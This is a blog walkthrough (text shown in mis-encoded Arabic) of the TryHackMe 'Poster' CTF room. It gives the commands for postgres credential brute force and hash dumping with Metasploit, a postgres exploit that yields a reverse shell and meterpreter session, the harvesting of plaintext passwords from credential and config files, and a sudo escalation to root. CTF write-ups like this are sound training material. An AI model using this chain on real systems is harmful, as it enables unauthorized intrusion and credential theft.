Search ๐Ÿ”Ž๐Ÿ–ฅ️

TryHackMe|Poster WriteUp\Walkthrough (Arabic)

ุจุณู… ุงู„ู„ู‡

ุงู„ู„ูŠ ูŠุจุบู‰ ูŠุดูˆู ุงู„ุญู„ ู…ุดุฑูˆุญ ููŠุฏูŠูˆ ูŠุฑุฌุน ู„ู„ููŠุฏูŠูˆ ุนู„ู‰ ู‚ู†ุงุชูŠ ุจุงู„ูŠูˆุชูŠูˆุจ ุนู„ู‰ ู‡ุฐุง ุงู„ุฑุงุจุท:


ุฑุงุจุท ุงู„ุชุญุฏูŠ: https://tryhackme.com/r/room/poster

====================================================

ูƒู„ู…ุฉ IP ููŠ ูƒู„ ุงู„ูƒูˆู…ุงู†ุฏุฒ ุงู„ู„ูŠ ุฃูƒุชุจู‡ุง ุชُุณุชุจุฏู„ ุจุงู„ู€IP ู„ู„ู…ุดูŠู† ุญู‚ุชูƒู… ุนู„ู‰ TryHackMe

ุฃูˆู„ ุญุงุฌุฉ ู†ุดุบู„ ุงู„ู€machine ูˆู†ุชุฃูƒุฏ ุฅู†ู†ุง ุงุชุตู„ู†ุง ุจุดุจูƒุฉ TryHackMe ูˆุงู„ุงุชุตุงู„ ู…ุถุจูˆุท، ุจุนุฏูŠู† ู†ุจุฏุฃ ุจุฃูˆู„ ุฎุทูˆุฉ ู„ู„ุญู„ ูˆู‡ูŠ ุฅู†ู†ุง ู†ุณูˆูŠ scan ู„ู„ุดุจูƒุฉ ุจุงุณุชุฎุฏุงู… nmap

sudo nmap IP -vv

ุทู„ุน ู…ุนุงู†ุง 3 ุจูˆุฑุชุงุช 22 ูˆ 80 ูˆ 5432

ุฃูˆู„ ูˆุซุงู†ูŠ ุณุคุงู„ ุณุฃู„ ุนู† ุงุณู… ุงู„ู€RDBMS ูˆุนู„ู‰ ุฃูŠ ุจูˆุฑุช؟ ุงู„ุจูˆุฑุช ู‡ูŠ 5432 ูˆุงุณู… ู†ุธุงู… ู‚ุงุนุฏุฉ ุงู„ุจูŠุงู†ุงุช ู‡ูˆ postgresql

ุจุนุฏ ูƒุฐุง ุจู†ุจุฏุฃ ู†ุดุชุบู„ ุจุงุณุชุฎุฏุงู… Metasploit ูˆู†ุฌู…ุน ุงู„ู…ุนู„ูˆู…ุงุช ุงู„ู„ูŠ ูŠุจุบุงู‡ุง، ุฃูˆู„ ุดูŠุก ู†ุดุบู„ Metasploit

msfconsole -q

ุจู…ุง ุฅู†ู†ุง ู†ุจุบู‰ ู†ุฌู…ุน ู…ุนู„ูˆู…ุงุช ูุฑุญ ู†ุจุญุซ ุนู† auxiliary ุชุตูŠุฑ ุงู„ูƒูˆู…ุงู†ุฏ

search postgre type:auxiliary 

 ุจู†ุณุชุฎุฏู… ุฑู‚ู… 4، ุซู… ู†ุนุฏู„ ุนู„ู‰ ุงู„ู€options

setg rhosts IP

ู‡ู†ุง ุงุณุชุฎุฏู…ุช setg ุนุดุงู† ูŠุตูŠุฑ ูƒู„ ู…ุฑุฉ ู†ุณุชุฎุฏู… module ุฌุฏูŠุฏุฉ ูŠุญุท ู‡ุฐู‡ ุงู„ู‚ูŠู…ุฉ ุจุฏูˆู† ู…ุง ุฃุฏุฎู„ู‡ุง ุฃู†ุง ูƒู„ ู…ุฑุฉ

set verbose false

run

ู„ู…ุง ู†ุดุบู„ู‡ุง ุจูŠุนุทูŠู†ูŠ ุงุณู… ุงู„ู…ุณุชุฎุฏู… postgres ูˆูƒู„ู…ุฉ ุงู„ุณุฑ ู„ู‡. ุจูƒุฐุง ูŠูƒูˆู† ุฌุงูˆุจู†ุง ุนู„ู‰ ุฑุงุจุน ูˆุฎุงู…ุณ ุณุคุงู„

ุจุนุฏ ูƒุฐุง ูŠุจุบู‰ ุงู„ู€version ู†ุดุบู„ ู†ูุณ ุงู„ูƒูˆู…ุงู†ุฏ ุงู„ู„ูŠ ุจุงู„ุฃุนู„ู‰ search postgre type:auxiliary، ุซู… ู†ุฎุชุงุฑ 6

use 6

setg password *******

run 

ุซู… ุจูŠุทุจุน ู„ู†ุง ุงู„ู€version 

ูˆุจูƒุฐุง ุฌุงูˆุจู†ุง ุนู„ู‰ ุงู„ุณุคุงู„ูŠู† ุงู„ู„ูŠ ุจุนุฏู‡ุง 

ุจุนุฏ ูƒุฐุง ูŠุจุบู‰ ุงู„ู€hashes ู†ุดุบู„ ู†ูุณ ุงู„ูƒูˆู…ุงู†ุฏ ุงู„ู„ูŠ ุจุงู„ุฃุนู„ู‰ search postgre type:auxiliary، ุซู… ู†ุฎุชุงุฑ 8

use 8

run

ูˆู‡ุฐู‡ ุฅุฌุงุจุฉ ุงู„ุณุคุงู„ูŠู† 8 ูˆ 9

ุจุนุฏ ูƒุฐุง ูŠุจุบู‰ ุงู„ู€module ุงู„ู„ูŠ ุชุณุงุนุฏู†ูŠ ุนู„ู‰ ู‚ุฑุงุกุฉ ุงู„ู…ู„ูุงุช ู…ู† ุงู„ุณูŠุฑููŠุฑ، ู†ุดุบู„ ู†ูุณ ุงู„ูƒูˆู…ุงู†ุฏ ุงู„ู„ูŠ ุจุงู„ุฃุนู„ู‰ search postgre type:auxiliary، ูˆู‡ูŠ ุจุชูƒูˆู† ุฑู‚ู… 5

ุจุนุฏู‡ุง ุณุฃู„ ุนู† ุงู„ู€module ุงู„ู„ูŠ ุชุณู…ุญ ุจุชู†ููŠุฐ ูƒูˆู…ุงู†ุฏุฒ ุนู„ู‰ ุงู„ุณูŠุฑููŠุฑ، ู‡ุฐู‡ ู„ุฃู†ู‡ุง ู…ูˆ ุจุณ ุชุฌู…ุน ุจูŠุงู†ุงุช، ุจู„ ุชุนุทูŠ ูˆุตูˆู„ ู„ู„ุณูŠุฑููŠุฑุชูƒูˆู† ู…ู† ู†ูˆุน exploit، ู„ุฐู„ูƒ ุจู†ุจุญุซ search postgre type:exploit

ู†ุณุชุฎุฏู… ุฑู‚ู… 2

ู‡ู†ุง ุฅุฌุงุจุฉ ุงู„ุณุคุงู„ูŠู† 10 ูˆ 11

ู†ุฑุฌุน ู„ู„ู€module، ู†ุนุฏู„ ุนู„ู‰ ุงู„ู€options ุงู„ู„ูŠ ุชุญุชุงุฌ ุชุนุฏูŠู„

set lhost tun0

tun0 ุชُุดูŠุฑ ุฅู„ู‰ ุนู†ูˆุงู† OpenVPN ุนู„ู‰ ุงู„ุฌู‡ุงุฒ

set rhosts IP

set password *****

run

ุจู†ุญุตู„ ุนู„ู‰ command shell، ู†ุถุบุท ู…ู† ุงู„ูƒูŠุจูˆุฑุฏ ุนู„ู‰ ctrl + z ุนู„ุดุงู† ู†ุญุทู‡ุง ุจุงู„ุฎู„ููŠุฉ، ุซู… ู†ุฑู‚ูŠ ู‡ุฐู‡ ุงู„ู€shell ุฅู„ู‰ meterpreter

sessions -u 1

ุจุนุฏ ู…ุง ู†ุญุตู„ ุนู„ู‰ ุงู„ู€meterpreter، ู†ุฑูˆุญ ู„ู‡ุง seesions 2 ุซู… ู†ุฑูˆุญ ู„ู„ู€home ูˆู†ุดูˆู ุฅุฐุง ู„ู‚ูŠู†ุง ุฃูŠ ูู„ุงู‚

cd /home

ls

cd dark

ls

ู‡ู†ุง ุนู†ุฏู†ุง ู…ู„ู ุงุณู…ู‡ credentials.txt، ูˆุฅุฐุง ุงุณุชุนุฑุถู†ุงู‡ cat credentials.txt ุจู†ู„ู‚ู‰ ุงุณู… ุงู„ู…ุณุชุฎุฏู… ูˆูƒู„ู…ุฉ ุงู„ุณุฑ ู„ู„ู…ุณุชุฎุฏู… dark. 

cd ../alison

ls

ูˆุจู†ู„ู‚ู‰ ุจุฏุงุฎู„ ู…ุฌู„ุฏ ุฃู„ูŠุณูˆู† ุงู„ูŠูˆุฒุฑ ูู„ุงู‚، ู„ูƒู† ู…ุง ู†ู‚ุฏุฑ ู†ู‚ุฑุฃู‡ ู„ุฃู† ู…ุง ุนู†ุฏู†ุง ุตู„ุงุญูŠุงุช ูƒุงููŠุฉ. ุงู„ุญูŠู† ุจู†ุฏุฎู„ ุนู„ู‰ ุงู„ู†ุธุงู… ุจุงุณุชุฎุฏุงู… SSH ูƒู€dark

ssh dark@IP

ุซู… ู†ุฏุฎู„ ูƒู„ู…ุฉ ุงู„ุณุฑ، ุซู… ู†ุณูˆูŠ spawn ู„ู€bash shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

ุงู„ุญูŠู† ุจู†ุจุญุซ ุนู† ุฃูŠ ู…ู„ู ุซุงู†ูŠ ุชู…ู„ูƒู‡ ุฃู„ูŠุณูˆู†، ู…ู…ูƒู† ูŠูƒูˆู† ููŠู‡ ู…ู„ู ู†ู‚ุฏุฑ ู†ุณุชุบู„ู‡ ูˆู…ู† ุฎู„ุงู„ู‡ ู†ูˆุตู„ ู„ุตู„ุงุญูŠุงุช ู†ู‚ุฏุฑ ู…ู† ุฎู„ุงู„ู‡ุง ู†ู‚ุฑุฃ ุงู„ูŠูˆุฒุฑ ูู„ุงู‚

find / -user alison 

ุทู„ุน ู…ุฌู…ูˆุนุฉ ูƒุจูŠุฑ ู…ู† ุงู„ู…ู„ูุงุช، ูˆุฃุญุฏู‡ุง ู‡ูˆ config.php

ุจุงู„ุนุงุฏุฉ ู…ู„ูุงุช ุงู„ู€conf ูŠูƒูˆู† ุจุฏุงุฎู„ู‡ุง ู…ุนู„ูˆู…ุงุช ู…ููŠุฏุฉ، ู…ู†ู‡ุง ุงุณู… ู…ุณุชุฎุฏู… ูˆูƒู„ู…ุฉ ู…ุฑูˆุฑ ู…ุซู„ุง، ู†ุณุชุนุฑุถ ุงู„ู…ู„ู 

cat /var/www/html/config.php

ูˆุจู†ู„ู‚ู‰ ุจุฏุงุฎู„ู‡ ูƒู„ู…ุฉ ุณุฑ ุฃู„ูŠุณูˆู†

su alison

ุจุนุฏ ู…ุง ู†ุนุทูŠู‡ ูƒู„ู…ุฉ ุงู„ู…ุฑูˆุฑ، ุจู†ุตูŠุฑ alison، ู†ุฑูˆุญ ู„ู„ู…ุฌู„ุฏ ุงู„ุฑุฆูŠุณูŠ ู„ู‡ุง ูˆู†ู‚ุฑุฃ ุงู„ูู„ุงู‚

cd /home/alison

cat user.txt

ุงู„ุญูŠู† ู†ุจูŠ ู†ู‚ุฑุฃ ุขุฎุฑ ูู„ุงู‚ ูˆุงู„ู„ูŠ ุนุงุฏุฉ ูŠูƒูˆู† ููŠ ุงู„ู€root home directory، ูู†ุญุชุงุฌ ู†ุฑูุน ุตู„ุงุญูŠุงุชู†ุง، ุจู†ุจุญุซ ูˆู†ุดูˆู ุงูŠุด ุงู„ูƒูˆู…ุงู†ุฏุฒ ุงู„ู„ูŠ ุชู‚ุฏุฑ ุฃู„ูŠุณูˆู† ุชู†ูุฐู‡ุง ูƒุฑูˆูˆุช ุจุฏูˆู† ุงุณุชุฎุฏุงู… ูƒู„ู…ุฉ ุณุฑ

sudo -l

ุทู„ุน ู„ู†ุง ุฅู† ุฃู„ูŠุณูˆู† ู…ู…ูƒู† ุชู†ูุฐ ุฃูŠ ูƒูˆู…ุงู†ุฏ ุนู„ู‰ ุงู„ู†ุธุงู… ุจุฏูˆู† ุฃูŠ ูƒู„ู…ุฉ ุณุฑ، ุฅุฐู† ุจูƒู„ ุณู‡ูˆู„ุฉ 

sudo su 

cd /root

cat root.txt 

ูˆุจูƒุฐุง ูŠูƒูˆู† ุญุตู„ู†ุง ุนู„ู‰ ุขุฎุฑ ูู„ุงู‚ ูˆุงู†ุชู‡ูŠู†ุง ู…ู† ุงู„ุญู„، ุจุงู„ุชูˆููŠูŠูŠู‚ ู„ูƒู… ๐Ÿ‘‹๐Ÿป๐Ÿ˜Š.

Comments

Popular posts from this blog

TryHackMe|Blog WriteUp\Walkthrough (Arabic)

TryHackMe|GoldenEye WriteUp\Walkthrough (English)

TryHackMe|Gallery WriteUp\Walkthrough (English)